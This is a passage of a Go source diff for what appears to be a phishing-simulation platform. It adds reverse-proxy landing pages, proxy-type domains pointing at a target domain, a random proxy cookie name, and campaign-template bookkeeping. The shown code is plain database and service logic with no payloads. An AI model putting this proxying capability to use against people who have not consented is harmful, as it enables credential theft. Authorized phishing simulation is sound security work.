ToCampaignTemplate(row *database.CampaignTemplate) (*model.CampaignTemplate Domain: domain, BeforeLandingPageID: beforeLandingPageID, BeforeLandingePage: beforeLandingPage, + BeforeLandingProxyID: beforeLandingProxyID, + BeforeLandingProxy: beforeLandingProxy, LandingPageID: landingPageID, LandingPage: landingPage, + LandingProxyID: landingProxyID, + LandingProxy: landingProxy, AfterLandingPageID: afterLandingPageID, AfterLandingPage: afterLandingPage, + AfterLandingProxyID: afterLandingProxyID, + AfterLandingProxy: afterLandingProxy, AfterLandingPageRedirectURL: redirectURL, EmailID: emailID, Email: email, @@ -808,3 +892,84 @@ func ToCampaignTemplate(row *database.CampaignTemplate) (*model.CampaignTemplate IsUsable: isUsable, }, nil } + +// RemoveProxyIDFromAll removes the proxy ID from any matching columns +// landing_proxy_id, before_landing_proxy_id and after_landing_proxy_id +// GetByProxyID gets campaign templates that use a specific proxy ID +func (r *CampaignTemplate) GetByProxyID( + ctx context.Context, + proxyID *uuid.UUID, + options *CampaignTemplateOption, +) ([]*model.CampaignTemplate, error) { + db := r.DB + if options.Columns != nil && len(options.Columns) > 0 { + db = db.Select(strings.Join(options.Columns, ",")) + } + db = r.load(options, db) + db, err := useQuery(db, database.CAMPAIGN_TEMPLATE_TABLE, options.QueryArgs, allowdCampaignTemplatesColumns...) + if err != nil { + return nil, errs.Wrap(err) + } + db = db.Where( + fmt.Sprintf( + "(%s = ? OR %s = ? 
OR %s = ?)", + TableColumn(database.CAMPAIGN_TEMPLATE_TABLE, "before_landing_proxy_id"), + TableColumn(database.CAMPAIGN_TEMPLATE_TABLE, "landing_proxy_id"), + TableColumn(database.CAMPAIGN_TEMPLATE_TABLE, "after_landing_proxy_id"), + ), + proxyID.String(), + proxyID.String(), + proxyID.String(), + ) + if options.UsableOnly { + db = db.Where( + fmt.Sprintf( + "%s = ?", + TableColumn(database.CAMPAIGN_TEMPLATE_TABLE, "is_usable"), + ), + true, + ) + } + var rows []*database.CampaignTemplate + res := db.Find(&rows) + if res.Error != nil { + return nil, res.Error + } + templates := []*model.CampaignTemplate{} + for _, row := range rows { + tmpl, err := ToCampaignTemplate(row) + if err != nil { + return nil, err + } + templates = append(templates, tmpl) + } + return templates, nil +} + +func (r *CampaignTemplate) RemoveProxyIDFromAll( + ctx context.Context, + proxyID *uuid.UUID, +) error { + columns := []string{"before_landing_proxy_id", "after_landing_proxy_id", "landing_proxy_id"} + for _, column := range columns { + row := map[string]any{} + AddUpdatedAt(row) + row[column] = nil + row["is_usable"] = false + res := r.DB. + Model(&database.CampaignTemplate{}). + Where( + fmt.Sprintf( + "%s = ?", + TableColumn(database.CAMPAIGN_TEMPLATE_TABLE, column), + ), + proxyID.String(), + ). 
+ Updates(row) + + if res.Error != nil { + return res.Error + } + } + return nil +} diff --git a/backend/repository/domain.go b/backend/repository/domain.go index 4166fb8..f69ab42 100644 --- a/backend/repository/domain.go +++ b/backend/repository/domain.go @@ -257,12 +257,27 @@ func ToDomain(row *database.Domain) *model.Domain { if row.CompanyID != nil { companyID.Set(*row.CompanyID) } + proxyID := nullable.NewNullNullable[uuid.UUID]() + if row.ProxyID != nil { + proxyID.Set(*row.ProxyID) + } var company *model.Company if row.Company != nil { company = ToCompany(row.Company) } id := nullable.NewNullableWithValue(row.ID) name := nullable.NewNullableWithValue(*vo.NewString255Must(row.Name)) + + // Handle domain type + domainType := row.Type + if domainType == "" { + domainType = "regular" + } + domainTypeValue := nullable.NewNullableWithValue(*vo.NewString32Must(domainType)) + + // Handle proxy target domain + proxyTargetDomain := nullable.NewNullableWithValue(*vo.NewOptionalString255Must(row.ProxyTargetDomain)) + managedTLS := nullable.NewNullableWithValue(row.ManagedTLSCerts) ownManagedTLS := nullable.NewNullableWithValue(row.OwnManagedTLS) hostWebsite := nullable.NewNullableWithValue(row.HostWebsite) @@ -275,6 +290,8 @@ func ToDomain(row *database.Domain) *model.Domain { CreatedAt: row.CreatedAt, UpdatedAt: row.UpdatedAt, Name: name, + Type: domainTypeValue, + ProxyTargetDomain: proxyTargetDomain, ManagedTLS: managedTLS, OwnManagedTLS: ownManagedTLS, HostWebsite: hostWebsite, @@ -282,21 +299,55 @@ func ToDomain(row *database.Domain) *model.Domain { PageNotFoundContent: staticNotFound, RedirectURL: redirectURL, CompanyID: companyID, + ProxyID: proxyID, Company: company, } } +// GetByProxyID gets domains by proxy ID +func (r *Domain) GetByProxyID( + ctx context.Context, + proxyID *uuid.UUID, + options *DomainOption, +) (*model.Result[model.Domain], error) { + result := model.NewEmptyResult[model.Domain]() + var dbDomains []database.Domain + db := r.DB + if 
options.WithCompany { + db = r.load(db) + } + db = db.Where("proxy_id = ?", proxyID) + dbRes := db.Find(&dbDomains) + + if dbRes.Error != nil { + return result, dbRes.Error + } + + for _, dbDomain := range dbDomains { + result.Rows = append(result.Rows, ToDomain(&dbDomain)) + } + return result, nil +} + // ToDomainSubset converts a domain subset from db row to model func ToDomainSubset(dbDomain *database.Domain) *model.DomainOverview { + domainType := dbDomain.Type + if domainType == "" { + domainType = "regular" + } + return &model.DomainOverview{ - ID: dbDomain.ID, - CreatedAt: dbDomain.CreatedAt, - UpdatedAt: dbDomain.UpdatedAt, - Name: dbDomain.Name, - HostWebsite: dbDomain.HostWebsite, - ManagedTLS: dbDomain.ManagedTLSCerts, - OwnManagedTLS: dbDomain.OwnManagedTLS, - RedirectURL: dbDomain.RedirectURL, - CompanyID: dbDomain.CompanyID, + ID: dbDomain.ID, + CreatedAt: dbDomain.CreatedAt, + UpdatedAt: dbDomain.UpdatedAt, + Name: dbDomain.Name, + Type: domainType, + ProxyTargetDomain: dbDomain.ProxyTargetDomain, + HostWebsite: dbDomain.HostWebsite, + ManagedTLS: dbDomain.ManagedTLSCerts, + OwnManagedTLS: dbDomain.OwnManagedTLS, + RedirectURL: dbDomain.RedirectURL, + CompanyID: dbDomain.CompanyID, + ProxyID: dbDomain.ProxyID, } } diff --git a/backend/repository/page.go b/backend/repository/page.go index 11c45ca..9832975 100644 --- a/backend/repository/page.go +++ b/backend/repository/page.go @@ -254,12 +254,34 @@ func ToPage(row *database.Page) (*model.Page, error) { } content := nullable.NewNullableWithValue(*c) + // Handle proxy fields + typeValue := row.Type + if typeValue == "" { + typeValue = "regular" + } + pageType := nullable.NewNullableWithValue(*vo.NewString32Must(typeValue)) + + targetURL, err := vo.NewOptionalString1024(row.TargetURL) + if err != nil { + return nil, errs.Wrap(err) + } + targetURLNullable := nullable.NewNullableWithValue(*targetURL) + + proxyConfig, err := vo.NewOptionalString1MB(row.ProxyConfig) + if err != nil { + return nil, 
errs.Wrap(err) + } + proxyConfigNullable := nullable.NewNullableWithValue(*proxyConfig) + return &model.Page{ - ID: id, - CreatedAt: row.CreatedAt, - UpdatedAt: row.UpdatedAt, - CompanyID: companyID, - Name: name, - Content: content, + ID: id, + CreatedAt: row.CreatedAt, + UpdatedAt: row.UpdatedAt, + CompanyID: companyID, + Name: name, + Content: content, + Type: pageType, + TargetURL: targetURLNullable, + ProxyConfig: proxyConfigNullable, }, nil } diff --git a/backend/repository/proxy.go b/backend/repository/proxy.go new file mode 100644 index 0000000..2c7d5ba --- /dev/null +++ b/backend/repository/proxy.go @@ -0,0 +1,299 @@ +package repository + +import ( + "context" + "fmt" + "strings" + + "github.com/google/uuid" + "github.com/oapi-codegen/nullable" + "github.com/phishingclub/phishingclub/database" + "github.com/phishingclub/phishingclub/errs" + "github.com/phishingclub/phishingclub/model" + "github.com/phishingclub/phishingclub/vo" + "gorm.io/gorm" +) + +var proxyAllowedColumns = assignTableToColumns(database.PROXY_TABLE, []string{ + "created_at", + "updated_at", + "name", + "start_url", +}) + +// ProxyOption is for eager loading +type ProxyOption struct { + Fields []string + *vo.QueryArgs + WithCompany bool +} + +// Proxy is a proxy repository +type Proxy struct { + DB *gorm.DB +} + +// load preloads the table relations +func (m *Proxy) load( + options *ProxyOption, + db *gorm.DB, +) *gorm.DB { + if options.WithCompany { + db = db.Joins("Company") + } + return db +} + +// Insert inserts a proxy +func (m *Proxy) Insert( + ctx context.Context, + proxy *model.Proxy, +) (*uuid.UUID, error) { + id := uuid.New() + row := proxy.ToDBMap() + row["id"] = id + AddTimestamps(row) + + res := m.DB. + Model(&database.Proxy{}). 
+ Create(row) + + if res.Error != nil { + return nil, res.Error + } + return &id, nil +} + +// GetAll gets proxies +func (m *Proxy) GetAll( + ctx context.Context, + companyID *uuid.UUID, + options *ProxyOption, +) (*model.Result[model.Proxy], error) { + result := model.NewEmptyResult[model.Proxy]() + var dbProxies []database.Proxy + db := m.load(options, m.DB) + db = withCompanyIncludingNullContext(db, companyID, database.PROXY_TABLE) + db, err := useQuery(db, database.PROXY_TABLE, options.QueryArgs, proxyAllowedColumns...) + if err != nil { + return result, errs.Wrap(err) + } + if options.Fields != nil { + fields := assignTableToColumns(database.PROXY_TABLE, options.Fields) + db = db.Select(strings.Join(fields, ",")) + } + dbRes := db. + Find(&dbProxies) + + if dbRes.Error != nil { + return result, dbRes.Error + } + + hasNextPage, err := useHasNextPage(db, database.PROXY_TABLE, options.QueryArgs, proxyAllowedColumns...) + if err != nil { + return result, errs.Wrap(err) + } + result.HasNextPage = hasNextPage + + for _, dbProxy := range dbProxies { + proxy, err := ToProxy(&dbProxy) + if err != nil { + return result, errs.Wrap(err) + } + result.Rows = append(result.Rows, proxy) + } + return result, nil +} + +// GetAllSubset gets proxies with limited data +func (m *Proxy) GetAllSubset( + ctx context.Context, + companyID *uuid.UUID, + options *ProxyOption, +) (*model.Result[model.ProxyOverview], error) { + result := model.NewEmptyResult[model.ProxyOverview]() + var dbProxies []database.Proxy + db := withCompanyIncludingNullContext(m.DB, companyID, database.PROXY_TABLE) + db, err := useQuery(db, database.PROXY_TABLE, options.QueryArgs, proxyAllowedColumns...) + if err != nil { + return result, errs.Wrap(err) + } + dbRes := db. + Select("id, created_at, updated_at, name, description, start_url, company_id"). 
+ Find(&dbProxies) + + if dbRes.Error != nil { + return result, dbRes.Error + } + + hasNextPage, err := useHasNextPage(db, database.PROXY_TABLE, options.QueryArgs, proxyAllowedColumns...) + if err != nil { + return result, errs.Wrap(err) + } + result.HasNextPage = hasNextPage + + for _, dbProxy := range dbProxies { + proxyOverview := model.ProxyOverview{ + ID: *dbProxy.ID, + CreatedAt: dbProxy.CreatedAt, + UpdatedAt: dbProxy.UpdatedAt, + Name: dbProxy.Name, + Description: dbProxy.Description, + StartURL: dbProxy.StartURL, + CompanyID: dbProxy.CompanyID, + } + result.Rows = append(result.Rows, &proxyOverview) + } + return result, nil +} + +// GetAllByCompanyID gets proxies by company id +func (m *Proxy) GetAllByCompanyID( + ctx context.Context, + companyID *uuid.UUID, + options *ProxyOption, +) (*model.Result[model.Proxy], error) { + result := model.NewEmptyResult[model.Proxy]() + var dbProxies []database.Proxy + db := m.load(options, m.DB) + db = whereCompany(db, database.PROXY_TABLE, companyID) + db, err := useQuery(db, database.PROXY_TABLE, options.QueryArgs, proxyAllowedColumns...) + if err != nil { + return result, errs.Wrap(err) + } + if options.Fields != nil { + fields := assignTableToColumns(database.PROXY_TABLE, options.Fields) + db = db.Select(strings.Join(fields, ",")) + } + dbRes := db. + Find(&dbProxies) + + if dbRes.Error != nil { + return result, dbRes.Error + } + + hasNextPage, err := useHasNextPage(db, database.PROXY_TABLE, options.QueryArgs, proxyAllowedColumns...) 
+ if err != nil { + return result, errs.Wrap(err) + } + result.HasNextPage = hasNextPage + + for _, dbProxy := range dbProxies { + proxy, err := ToProxy(&dbProxy) + if err != nil { + return result, errs.Wrap(err) + } + result.Rows = append(result.Rows, proxy) + } + return result, nil +} + +// GetByID gets proxy by id +func (m *Proxy) GetByID( + ctx context.Context, + id *uuid.UUID, + options *ProxyOption, +) (*model.Proxy, error) { + dbProxy := database.Proxy{} + db := m.load(options, m.DB) + result := db. + Where(TableColumnID(database.PROXY_TABLE)+" = ?", id). + First(&dbProxy) + + if result.Error != nil { + return nil, result.Error + } + return ToProxy(&dbProxy) +} + +// GetByNameAndCompanyID gets proxy by name +func (m *Proxy) GetByNameAndCompanyID( + ctx context.Context, + name *vo.String64, + companyID *uuid.UUID, // can be null + options *ProxyOption, +) (*model.Proxy, error) { + proxy := database.Proxy{} + db := m.load(options, m.DB) + db = withCompanyIncludingNullContext(db, companyID, database.PROXY_TABLE) + result := db. + Where( + fmt.Sprintf( + "%s = ?", + TableColumn(database.PROXY_TABLE, "name"), + ), + name.String(), + ). + First(&proxy) + + if result.Error != nil { + return nil, result.Error + } + return ToProxy(&proxy) +} + +// UpdateByID updates a proxy by id +func (m *Proxy) UpdateByID( + ctx context.Context, + id *uuid.UUID, + proxy *model.Proxy, +) error { + row := proxy.ToDBMap() + AddUpdatedAt(row) + res := m.DB. + Model(&database.Proxy{}). + Where("id = ?", id). 
+ Updates(row) + + if res.Error != nil { + return res.Error + } + return nil +} + +// DeleteByID deletes a proxy by id +func (m *Proxy) DeleteByID( + ctx context.Context, + id *uuid.UUID, +) error { + result := m.DB.Delete(&database.Proxy{}, id) + + if result.Error != nil { + return result.Error + } + return nil +} + +func ToProxy(row *database.Proxy) (*model.Proxy, error) { + id := nullable.NewNullableWithValue(*row.ID) + companyID := nullable.NewNullNullable[uuid.UUID]() + if row.CompanyID != nil { + companyID.Set(*row.CompanyID) + } + name := nullable.NewNullableWithValue(*vo.NewString64Must(row.Name)) + + description, err := vo.NewOptionalString1024(row.Description) + if err != nil { + return nil, errs.Wrap(err) + } + descriptionNullable := nullable.NewNullableWithValue(*description) + + startURL := nullable.NewNullableWithValue(*vo.NewString1024Must(row.StartURL)) + + proxyConfig, err := vo.NewString1MB(row.ProxyConfig) + if err != nil { + return nil, errs.Wrap(err) + } + proxyConfigNullable := nullable.NewNullableWithValue(*proxyConfig) + + return &model.Proxy{ + ID: id, + CreatedAt: row.CreatedAt, + UpdatedAt: row.UpdatedAt, + CompanyID: companyID, + Name: name, + Description: descriptionNullable, + StartURL: startURL, + ProxyConfig: proxyConfigNullable, + }, nil +} diff --git a/backend/seed/migrate.go b/backend/seed/migrate.go index d54aeed..25f43df 100644 --- a/backend/seed/migrate.go +++ b/backend/seed/migrate.go @@ -1,6 +1,8 @@ package seed import ( + "crypto/rand" + "github.com/go-errors/errors" "github.com/google/uuid" "github.com/phishingclub/phishingclub/app" @@ -34,6 +36,7 @@ func initialInstallAndSeed( &database.RecipientGroupRecipient{}, &database.Domain{}, &database.Page{}, + &database.Proxy{}, &database.SMTPHeader{}, &database.SMTPConfiguration{}, &database.Email{}, @@ -51,16 +54,33 @@ func initialInstallAndSeed( &database.Identifier{}, &database.CampaignStats{}, } + + // disable foreign key constraints temporarily for sqlite to allow table 
recreation + logger.Debug("disabling foreign key constraints for migration") + err := db.Exec("PRAGMA foreign_keys = OFF").Error + if err != nil { + return errs.Wrap(errors.Errorf("failed to disable foreign keys: %w", err)) + } + // create tables logger.Debug("migrating tables") - err := db.AutoMigrate( + err = db.AutoMigrate( tables..., ) if err != nil { + // re-enable foreign keys before returning error + db.Exec("PRAGMA foreign_keys = ON") return errs.Wrap( errors.Errorf("failed to migrate database: %w", err), ) } + + // re-enable foreign key constraints + logger.Debug("re-enabling foreign key constraints after migration") + err = db.Exec("PRAGMA foreign_keys = ON").Error + if err != nil { + return errs.Wrap(errors.Errorf("failed to re-enable foreign keys: %w", err)) + } for _, table := range tables { t, ok := table.(database.Migrater) if !ok { @@ -244,6 +264,40 @@ func SeedSettings( } } } + { + // seed proxy cookie name + id := uuid.New() + var c int64 + res := db. + Model(&database.Option{}). + Where("key = ?", data.OptionKeyProxyCookieName). 
+ Count(&c) + + if res.Error != nil { + return errs.Wrap(res.Error) + } + if c == 0 { + // generate random 8-character cookie name + b := make([]byte, 8) + _, err := rand.Read(b) + if err != nil { + return errs.Wrap(err) + } + charset := "abcdefghijklmnopqrstuvwxyz" + cookieName := "" + for i := range b { + cookieName += string(charset[int(b[i])%len(charset)]) + } + res = db.Create(&database.Option{ + ID: &id, + Key: data.OptionKeyProxyCookieName, + Value: cookieName, + }) + if res.Error != nil { + return errs.Wrap(res.Error) + } + } + } return nil } diff --git a/backend/server/shared.go b/backend/server/shared.go new file mode 100644 index 0000000..4dea6bd --- /dev/null +++ b/backend/server/shared.go @@ -0,0 +1,58 @@ +package server + +import ( + "context" + "net/http" + + "github.com/google/uuid" + "github.com/phishingclub/phishingclub/model" + "github.com/phishingclub/phishingclub/repository" +) + +// GetCampaignRecipientFromURLParams extracts campaign recipient information from URL parameters +// by checking all identifiers against query parameters and finding the first matching campaign recipient. +// returns the campaign recipient object, parameter name, and any error encountered. 
+func GetCampaignRecipientFromURLParams( + ctx context.Context, + req *http.Request, + identifierRepo *repository.Identifier, + campaignRecipientRepo *repository.CampaignRecipient, +) (*model.CampaignRecipient, string, error) { + // get all identifiers + identifiers, err := identifierRepo.GetAll(ctx, &repository.IdentifierOption{}) + if err != nil { + return nil, "", err + } + + query := req.URL.Query() + var matchingParams []struct { + name string + id *uuid.UUID + } + + // collect all query parameters that match identifier names and can be parsed as UUIDs + for _, identifier := range identifiers.Rows { + if name := identifier.Name.MustGet(); query.Has(name) { + if id, err := uuid.Parse(query.Get(name)); err == nil { + matchingParams = append(matchingParams, struct { + name string + id *uuid.UUID + }{name: name, id: &id}) + } + } + } + + if len(matchingParams) == 0 { + return nil, "", nil + } + + // check each matching parameter to find a valid campaign recipient + for _, param := range matchingParams { + campaignRecipient, err := campaignRecipientRepo.GetByCampaignRecipientID(ctx, param.id) + if err == nil && campaignRecipient != nil { + return campaignRecipient, param.name, nil + } + } + + return nil, "", nil +} diff --git a/backend/service/campaignTemplate.go b/backend/service/campaignTemplate.go index f1be7a1..a1f4995 100644 --- a/backend/service/campaignTemplate.go +++ b/backend/service/campaignTemplate.go @@ -587,24 +587,51 @@ func (c *CampaignTemplate) UpdateByID( if campaignTemplate.BeforeLandingPageID.IsSpecified() { if v, err := campaignTemplate.BeforeLandingPageID.Get(); err == nil { incoming.BeforeLandingPageID.Set(v) + incoming.BeforeLandingProxyID.SetNull() // clear proxy if page is set } else { incoming.BeforeLandingPageID.SetNull() } } + if campaignTemplate.BeforeLandingProxyID.IsSpecified() { + if v, err := campaignTemplate.BeforeLandingProxyID.Get(); err == nil { + incoming.BeforeLandingProxyID.Set(v) + incoming.BeforeLandingPageID.SetNull() // 
clear page if proxy is set + } else { + incoming.BeforeLandingProxyID.SetNull() + } + } if campaignTemplate.LandingPageID.IsSpecified() { if v, err := campaignTemplate.LandingPageID.Get(); err == nil { incoming.LandingPageID.Set(v) + incoming.LandingProxyID.SetNull() // clear proxy if page is set } else { incoming.LandingPageID.SetNull() } } + if campaignTemplate.LandingProxyID.IsSpecified() { + if v, err := campaignTemplate.LandingProxyID.Get(); err == nil { + incoming.LandingProxyID.Set(v) + incoming.LandingPageID.SetNull() // clear page if proxy is set + } else { + incoming.LandingProxyID.SetNull() + } + } if campaignTemplate.AfterLandingPageID.IsSpecified() { if v, err := campaignTemplate.AfterLandingPageID.Get(); err == nil { incoming.AfterLandingPageID.Set(v) + incoming.AfterLandingProxyID.SetNull() // clear proxy if page is set } else { incoming.AfterLandingPageID.SetNull() } } + if campaignTemplate.AfterLandingProxyID.IsSpecified() { + if v, err := campaignTemplate.AfterLandingProxyID.Get(); err == nil { + incoming.AfterLandingProxyID.Set(v) + incoming.AfterLandingPageID.SetNull() // clear page if proxy is set + } else { + incoming.AfterLandingProxyID.SetNull() + } + } if campaignTemplate.AfterLandingPageRedirectURL.IsSpecified() { if v, err := campaignTemplate.AfterLandingPageRedirectURL.Get(); err == nil { incoming.AfterLandingPageRedirectURL.Set(v) @@ -704,3 +731,76 @@ func (c *CampaignTemplate) DeleteByID( c.AuditLogAuthorized(ae) return nil } + +// RemoveProxiesByProxyID removes the Proxy ID from templates +func (c *CampaignTemplate) RemoveProxiesByProxyID( + ctx context.Context, + session *model.Session, + proxyID *uuid.UUID, +) error { + ae := NewAuditEvent("CampaignTemplate.RemoveProxiesByProxyID", session) + ae.Details["proxyId"] = proxyID.String() + // check permissions + isAuthorized, err := IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + c.LogAuthError(err) + return err + } 
+ if !isAuthorized { + c.AuditLogNotAuthorized(ae) + return errs.ErrAuthorizationFailed + } + + // get all templates that use this proxy + templatesAffected, err := c.CampaignTemplateRepository.GetByProxyID( + ctx, + proxyID, + &repository.CampaignTemplateOption{}, + ) + if err != nil { + c.Logger.Errorw("failed to get affected campaign templates", "error", err) + return err + } + + // get all campaigns using these templates and close active ones + templateIDs := []*uuid.UUID{} + for _, t := range templatesAffected { + id := t.ID.MustGet() + templateIDs = append(templateIDs, &id) + } + + if len(templateIDs) > 0 { + campaignsAffected, err := c.CampaignRepository.GetByTemplateIDs(ctx, templateIDs) + if err != nil { + c.Logger.Errorw("failed to get affected campaigns by template IDs", "error", err) + return err + } + + for _, campaign := range campaignsAffected { + if !campaign.IsActive() { + continue + } + err := campaign.Close() + if err != nil { + c.Logger.Errorw("failed to close campaign", "error", err) + } + campaignID := campaign.ID.MustGet() + err = c.CampaignRepository.UpdateByID( + ctx, + &campaignID, + campaign, + ) + if err != nil { + c.Logger.Errorw("failed to update closed campaign", "error", err) + } + } + } + + // remove the Proxy id from the templates + err = c.CampaignTemplateRepository.RemoveProxyIDFromAll(ctx, proxyID) + if err != nil { + c.Logger.Errorw("failed to remove Proxy ID from all campaign templates", "error", err) + return err + } + return nil +} diff --git a/backend/service/domain.go b/backend/service/domain.go index 06c1891..2ce4e1a 100644 --- a/backend/service/domain.go +++ b/backend/service/domain.go @@ -7,6 +7,7 @@ import ( "fmt" "net" "net/http" + "strings" "time" "github.com/go-errors/errors" @@ -39,11 +40,49 @@ type Domain struct { TemplateService *Template } +// CreateProxyDomain creates a proxy domain bypassing direct creation restrictions +func (d *Domain) CreateProxyDomain( + ctx context.Context, + session *model.Session, + 
domain *model.Domain, +) (*uuid.UUID, error) { + return d.createDomain(ctx, session, domain, true) +} + // Create creates a new domain func (d *Domain) Create( ctx context.Context, session *model.Session, domain *model.Domain, +) (*uuid.UUID, error) { + return d.createDomain(ctx, session, domain, false) +} + +// DeleteProxyDomain deletes a proxy domain bypassing direct deletion restrictions +func (d *Domain) DeleteProxyDomain( + ctx context.Context, + session *model.Session, + id *uuid.UUID, +) error { + return d.deleteDomain(ctx, session, id, true) +} + +// UpdateProxyDomain updates a proxy domain bypassing direct update restrictions +func (d *Domain) UpdateProxyDomain( + ctx context.Context, + session *model.Session, + id *uuid.UUID, + incoming *model.Domain, +) error { + return d.updateDomain(ctx, session, id, incoming, true) +} + +// createDomain is the internal domain creation method +func (d *Domain) createDomain( + ctx context.Context, + session *model.Session, + domain *model.Domain, + allowProxyCreation bool, ) (*uuid.UUID, error) { ae := NewAuditEvent("Domain.Create", session) // check permissions @@ -56,22 +95,40 @@ func (d *Domain) Create( d.AuditLogNotAuthorized(ae) return nil, errs.ErrAuthorizationFailed } - // validate data - if err := domain.Validate(); err != nil { - // d.Logger.Debugf("failed to validate domain", "error", err) - return nil, errs.Wrap(err) - } - // validate template content if present - if pageContent, err := domain.PageContent.Get(); err == nil { - if err := d.TemplateService.ValidateDomainTemplate(pageContent.String()); err != nil { - d.Logger.Errorw("failed to validate domain page template", "error", err) - return nil, validate.WrapErrorWithField(errors.New("invalid page template: "+err.Error()), "pageContent") + // prevent direct creation of proxy domains unless explicitly allowed + if !allowProxyCreation { + if domainType, err := domain.Type.Get(); err == nil && domainType.String() == "proxy" { + return nil, 
validate.WrapErrorWithField(errors.New("proxy domains can only be created through proxy configuration, not directly"), "type") } } - if notFoundContent, err := domain.PageNotFoundContent.Get(); err == nil { - if err := d.TemplateService.ValidateDomainTemplate(notFoundContent.String()); err != nil { - d.Logger.Errorw("failed to validate domain not found template", "error", err) - return nil, validate.WrapErrorWithField(errors.New("invalid not found template: "+err.Error()), "pageNotFoundContent") + + // validate data + if err := domain.Validate(); err != nil { + d.Logger.Errorw("failed to validate domain", "error", err) + return nil, errs.Wrap(err) + } + + // get domain type for specific validation + domainType, _ := domain.Type.Get() + + if domainType.String() == "proxy" { + // validate proxy target domain + if err := d.validateProxyDomain(ctx, domain); err != nil { + return nil, err + } + } else { + // validate template content for regular domains + if pageContent, err := domain.PageContent.Get(); err == nil { + if err := d.TemplateService.ValidateDomainTemplate(pageContent.String()); err != nil { + d.Logger.Errorw("failed to validate domain page template", "error", err) + return nil, validate.WrapErrorWithField(errors.New("invalid page template: "+err.Error()), "pageContent") + } + } + if notFoundContent, err := domain.PageNotFoundContent.Get(); err == nil { + if err := d.TemplateService.ValidateDomainTemplate(notFoundContent.String()); err != nil { + d.Logger.Errorw("failed to validate domain not found template", "error", err) + return nil, validate.WrapErrorWithField(errors.New("invalid not found template: "+err.Error()), "pageNotFoundContent") + } } } // check for uniqueness @@ -365,6 +422,17 @@ func (d *Domain) UpdateByID( session *model.Session, id *uuid.UUID, incoming *model.Domain, +) error { + return d.updateDomain(ctx, session, id, incoming, false) +} + +// updateDomain is the internal domain update method +func (d *Domain) updateDomain( + ctx 
context.Context, + session *model.Session, + id *uuid.UUID, + incoming *model.Domain, + allowProxyUpdate bool, ) error { ae := NewAuditEvent("Domain.UpdateByID", session) ae.Details["id"] = id.String() @@ -392,7 +460,78 @@ func (d *Domain) UpdateByID( d.Logger.Errorw("failed to update domain", "error", err) return err } + + // check if this is a proxy domain and restrict editable fields + isProxyDomain := false + if domainType, err := current.Type.Get(); err == nil && domainType.String() == "proxy" { + isProxyDomain = true + // for proxy domains, only allow updating ManagedTLS and custom certificate fields + if incoming.Type.IsSpecified() { + incomingType, _ := incoming.Type.Get() + if incomingType.String() != "proxy" { + return validate.WrapErrorWithField(errors.New("cannot change type of proxy domain"), "type") + } + } + } else { + // prevent changing regular domains to proxy type + if incoming.Type.IsSpecified() { + incomingType, _ := incoming.Type.Get() + if incomingType.String() == "proxy" { + return validate.WrapErrorWithField(errors.New("cannot change domain to proxy type - proxy domains can only be created through proxy configuration"), "type") + } + } + } + // set the supplied field on the existing domain + if isProxyDomain && !allowProxyUpdate { + // for proxy domains, prevent changing proxy-specific fields unless explicitly allowed + if incoming.ProxyTargetDomain.IsSpecified() { + return validate.WrapErrorWithField(errors.New("cannot change proxy target domain - edit the proxy configuration instead"), "proxyTargetDomain") + } + if incoming.HostWebsite.IsSpecified() { + return validate.WrapErrorWithField(errors.New("cannot change host website setting for proxy domain"), "hostWebsite") + } + if incoming.PageContent.IsSpecified() { + return validate.WrapErrorWithField(errors.New("cannot change page content for proxy domain"), "pageContent") + } + if incoming.PageNotFoundContent.IsSpecified() { + return validate.WrapErrorWithField(errors.New("cannot change 
page not found content for proxy domain"), "pageNotFoundContent") + } + if incoming.RedirectURL.IsSpecified() { + return validate.WrapErrorWithField(errors.New("cannot change redirect URL for proxy domain"), "redirectURL") + } + } else { + // for regular domains or proxy domains with allowed updates, allow updating all fields + if v, err := incoming.Type.Get(); err == nil { + current.Type.Set(v) + } + if v, err := incoming.ProxyTargetDomain.Get(); err == nil { + current.ProxyTargetDomain.Set(v) + } + if v, err := incoming.HostWebsite.Get(); err == nil { + current.HostWebsite.Set(v) + } + if v, err := incoming.PageContent.Get(); err == nil { + // validate template content before updating + if err := d.TemplateService.ValidateDomainTemplate(v.String()); err != nil { + d.Logger.Errorw("failed to validate domain page template", "error", err) + return validate.WrapErrorWithField(errors.New("invalid page template: "+err.Error()), "pageContent") + } + current.PageContent.Set(v) + } + if v, err := incoming.PageNotFoundContent.Get(); err == nil { + // validate template content before updating + if err := d.TemplateService.ValidateDomainTemplate(v.String()); err != nil { + d.Logger.Errorw("failed to validate domain not found template", "error", err) + return validate.WrapErrorWithField(errors.New("invalid not found template: "+err.Error()), "pageNotFoundContent") + } + current.PageNotFoundContent.Set(v) + } + if v, err := incoming.RedirectURL.Get(); err == nil { + current.RedirectURL.Set(v) + } + } + wasManagedTLS := current.ManagedTLS.MustGet() if v, err := incoming.ManagedTLS.Get(); err == nil { current.ManagedTLS.Set(v) @@ -413,33 +552,33 @@ func (d *Domain) UpdateByID( current.OwnManagedTLSPem.Set(v) ownManagedTLSPemIsSet = len(v) > 0 } - if v, err := incoming.HostWebsite.Get(); err == nil { - current.HostWebsite.Set(v) - } - if v, err := incoming.PageContent.Get(); err == nil { - // validate template content before updating - if err := 
d.TemplateService.ValidateDomainTemplate(v.String()); err != nil { - d.Logger.Errorw("failed to validate domain page template", "error", err) - return validate.WrapErrorWithField(errors.New("invalid page template: "+err.Error()), "pageContent") - } - current.PageContent.Set(v) - } - if v, err := incoming.PageNotFoundContent.Get(); err == nil { - // validate template content before updating - if err := d.TemplateService.ValidateDomainTemplate(v.String()); err != nil { - d.Logger.Errorw("failed to validate domain not found template", "error", err) - return validate.WrapErrorWithField(errors.New("invalid not found template: "+err.Error()), "pageNotFoundContent") - } - current.PageNotFoundContent.Set(v) - } - if v, err := incoming.RedirectURL.Get(); err == nil { - current.RedirectURL.Set(v) - } + // validate if err := current.Validate(); err != nil { d.Logger.Errorw("failed to validate domain", "error", err) return err } + + // validate proxy domain if type is proxy + if domainType, err := current.Type.Get(); err == nil && domainType.String() == "proxy" { + if err := d.validateProxyDomain(ctx, current); err != nil { + return err + } + } else { + // validate template content for regular domains only + if pageContent, err := current.PageContent.Get(); err == nil { + if err := d.TemplateService.ValidateDomainTemplate(pageContent.String()); err != nil { + d.Logger.Errorw("failed to validate domain page template", "error", err) + return validate.WrapErrorWithField(errors.New("invalid page template: "+err.Error()), "pageContent") + } + } + if notFoundContent, err := current.PageNotFoundContent.Get(); err == nil { + if err := d.TemplateService.ValidateDomainTemplate(notFoundContent.String()); err != nil { + d.Logger.Errorw("failed to validate 